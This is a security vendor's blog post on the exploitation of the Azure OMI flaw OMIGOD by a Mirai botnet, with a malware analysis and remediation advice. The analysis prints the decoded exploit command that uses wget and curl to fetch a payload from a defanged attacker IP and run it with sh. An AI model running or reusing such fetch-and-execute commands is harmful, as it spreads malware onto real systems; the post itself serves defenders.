Azure OMI Vulnerability OMIGOD (CVE-2021-38647) Now Under Exploitation

Azure users running Linux virtual machines are at risk of compromise unless they upgrade now. A vulnerable piece of management software in the Open Management Infrastructure (OMI) framework can be remotely exploited by attackers enabling them to escalate to root privileges and remotely execute malicious code. 

Azure will automatically install the OMI agent when users set up a Linux VM and monitoring and other services are enabled. By default, OMI runs with root access – making the system extremely vulnerable and subject to compromise. It typically runs on ports 5986, 5985, and 1270; however, any port can be used.

Incredibly, OMIGOD, discovered by researchers at Wiz, is exploited by simply skipping the authentication of requests, which defaults with root access across systems.

Below our team has performed an analysis of a real-world attack we’ve observed that exploits OMIGOD.

Are you interested in threat intelligence? We’re currently recruiting for a Threat Intelligence Engineer.

Mirai Botnet – Quick off the Mark

There is always a race among botnets to see who can compromise hosts first. Greynoise has reported on a number of systems that are either scanning for, or actively exploiting, OMIGOD.

One botnet operator is definitely attempting it though, and credit to Germán Fernández for picking this one up:

Malware Analysis

Below we have analysed an x86 Mirai sample from http://212.192.241[.]72/bins/dark.x86

The worm tries to spread to other systems through a number of vulnerabilities, including OMIGOD.

We can see the exploit code for OMIGOD after decompiling the sample with Retdec:

The parameter <p:command> contains the following command, encoded with base64:

wget http://212.192.241[.]72/; curl -O http://212.192.241[.]72/; chmod 777; sh

Which is subsequently used to install the Mirai botnet via the URL:

  • http://212.192.241[.]72/

The file is a fairly standard Mirai installer that:

  • Attempts to install across multiple possible Architectures
  • Hides itself as the legitimate web server “nginx”
  • Then closes the ports of the vulnerabilities it exploited to stop other botnets taking over the system:


Ensure Microsoft Azure Firewall is set to block any access to OMI ports.

You can check that the OMI agent is not present on your Linux systems:

[email protected]:~$ sudo dpkg -l omi

dpkg-query: no packages found matching omi

If it is, ensure it is running the latest version. Microsoft is not automatically updating insecure agents, and even systems deployed after the publication of the vulnerability may be vulnerable. They have provided guidance to customers in a post titled “Open Management Infrastructure Remote Code Execution Vulnerability”.

Cado Response

If you’d like to investigate potentially compromised machines, the full unlimited version of the Cado Response platform is now available for Azure via a free trial. The Cado Response platform does not run the OMI agent.

Indicators of Compromise






















About Cado Security

Cado Security is the cloud investigation and response automation company. The Cado platform leverages the scale, speed and automation of the cloud to effortlessly deliver forensic-level detail into cloud, container and serverless environments. Only Cado empowers security teams to investigate and respond at cloud speed.